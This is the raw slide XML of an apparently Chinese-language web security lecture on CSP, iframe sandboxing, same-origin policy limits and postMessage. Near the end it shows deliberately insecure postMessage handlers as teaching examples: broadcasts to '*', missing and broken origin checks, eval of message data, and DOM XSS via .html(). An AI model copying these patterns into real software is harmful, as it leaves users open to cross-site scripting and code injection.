              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net wss://*.facebook.com:* ws://*.facebook.com:* http://*.akamaihd.net https://fb.scanandcleanlocal.com:* *.atlassolutions.com http://attachment.fbsbx.com https://attachment.fbsbx.com;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="912920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对提升网站安全性、预防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击起到促进作用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>但是实际尚未普及</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>部署比较困难，需要重写设计内联脚本的代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>采用“源粒度”比较粗糙</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>非白即黑的策略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12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通过iframe管理第三方内容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现代</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用经常使用插件、广告等第三方资源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>直接在页面中插入相关内容代码？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第三方插件可以访问页面所有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>广告插件经常这样做</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将第三方内容限制在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中的方式更安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将顶层源和第三方脚本区别对待</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>但是这种隔离机制并不完美</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>framebusting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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(top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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!=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self) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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top.location.replace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(location);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100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HTML5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>沙箱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420100" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTML5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>沙箱采用最小权限原则管理第三方脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用声明必要的权限，禁止其它非必要权限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EE712F-5D63-3445-8006-ED4CF53B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4" y="2773273"/>
            <a:ext cx="8335443" cy="547986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&lt;iframe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altLang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BDB76B"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>src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‘http://example.com/widget’  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BDB76B"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>sandbox</a:t>
            </a:r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&gt;&lt;/iframe&gt;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13D1A3-2E83-3F4D-ADE4-EE4F64AA5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4" y="3589507"/>
            <a:ext cx="8335443" cy="547986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2578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&lt;iframe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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BDB76B"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>src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‘http://example.com/widget’  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BDB76B"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="65B042"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>‘allow-forms’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="89BDFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&gt;&lt;/iframe&gt;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7E4640-CD01-7540-9FD7-0A6357684835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866775" y="4267201"/>
            <a:ext cx="8543925" cy="19913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kumimoji="0" sz="2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  <a:defRPr kumimoji="0" sz="2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anose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø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 typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr kumimoji="0"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902030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49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其它选项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en-US" dirty="0"/>
              <a:t>allow-same-origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>allow-scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>allow-top-navigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>allow-popups</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17978431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沙箱的问题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Sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的缺点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>插件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Plugins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）不受浏览器沙箱的约束</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>禁用脚本、表单意味着其插件也应当禁止</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>但是，很多广告、视频、游戏使用插件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>更多将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>沙箱化的方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Caja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, FBJS2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AdJail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03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同源策略的问题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安全专家认为同源策略不够强？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认为所有的源都是等价的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>任意源可能提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击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不允许源设置限制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来自某些源的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;scripts&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开发者认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>太严格了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>禁止发往其它源的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XHR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>禁止访问其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>web APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（如谷歌地图）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>禁止在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>间共享内容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77088" y="1753669"/>
            <a:ext cx="1823961" cy="1971092"/>
            <a:chOff x="8739673" y="2226906"/>
            <a:chExt cx="2244876" cy="2425959"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Right Brace 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8739673" y="2226906"/>
              <a:ext cx="566058" cy="2425959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79430" y="3024386"/>
              <a:ext cx="1405119" cy="85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>
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>CSP</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>sandbox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77089" y="4548728"/>
            <a:ext cx="2370585" cy="1028506"/>
            <a:chOff x="8739673" y="4851918"/>
            <a:chExt cx="2917643" cy="1265853"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Right Brace 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8739673" y="4851918"/>
              <a:ext cx="566058" cy="1265853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902030302020204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79429" y="5069346"/>
              <a:ext cx="2077887" cy="85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50" dirty="0" err="1">
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>postMessage</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1950" dirty="0">
                <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>CORS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75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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>间消息传递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开发者想要和同一页面的不同源内容进行消息传递</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.bank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>payments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.bank.io</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第三方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>idgets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>同源规则不允许</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>机制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postMessage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007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数据传递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1981200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="436809" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中发送</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="436809" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中传递</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="436809" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="436809" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> body (form)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中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03633" y="3712496"/>
            <a:ext cx="8420101" cy="1445914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="74295" tIns="37148" rIns="74295" bIns="3714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056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7584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0112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62640" indent="-31252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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>purchase.html?user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cbw&amp;item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iPad&amp;price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=399.99#shopping_cart HTTP/1.1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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; item=iPad; price=399.99;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X-My-Header: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/iPad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/399.99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user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw&amp;item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iPad&amp;price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=399.99</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3252451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postMessage示例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77A09F"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>// Origin A (https://user.bank.io)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b="1" dirty="0" err="1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var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data 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=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{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msg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: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1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transfer_money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,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amount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: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1000.00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};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parent.postMessage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(data, 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'https://payments.bank.io'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);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77A09F"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>// Origin B (https://payments.bank.io)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b="1" dirty="0" err="1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var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onMessage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=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b="1" dirty="0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function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msg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) {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" b="1" dirty="0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if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(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msg.origin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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>==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'https://user.bank.io'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) {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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="77A09F"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>// Do stuff...</a:t>
            </a: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    }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};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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0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addEventListener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D7391E"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'message'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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1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onMessage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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo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5192" y="3832063"/>
            <a:ext cx="8930562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471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postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>广播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parent.postMessage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user_info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'*'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘*’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发送广播消息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>都能接收到消息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174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postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的安全性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// No origin check :(</a:t>
            </a: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$(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'#some-div'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).text(msg.data.info);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// Broken origin check; matches *.bank.io,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but also www.bank.io.attacker.com</a:t>
            </a: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b="1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if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(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msg.origin.indexOf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'.bank.io'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&gt;=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0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// Code execution</a:t>
            </a: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25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eval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msg.data.code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25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="77A09F"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>// DOM-based XSS</a:t>
            </a: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$(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'#some-div'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).html(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msg.data.tmpl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marL="0" indent="0" defTabSz="315754">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="237331" algn="l"/>
                <a:tab pos="484981" algn="l"/>
                <a:tab pos="732631" algn="l"/>
                <a:tab pos="980281" algn="l"/>
                <a:tab pos="1227931" algn="l"/>
                <a:tab pos="1465263" algn="l"/>
                <a:tab pos="1712913" algn="l"/>
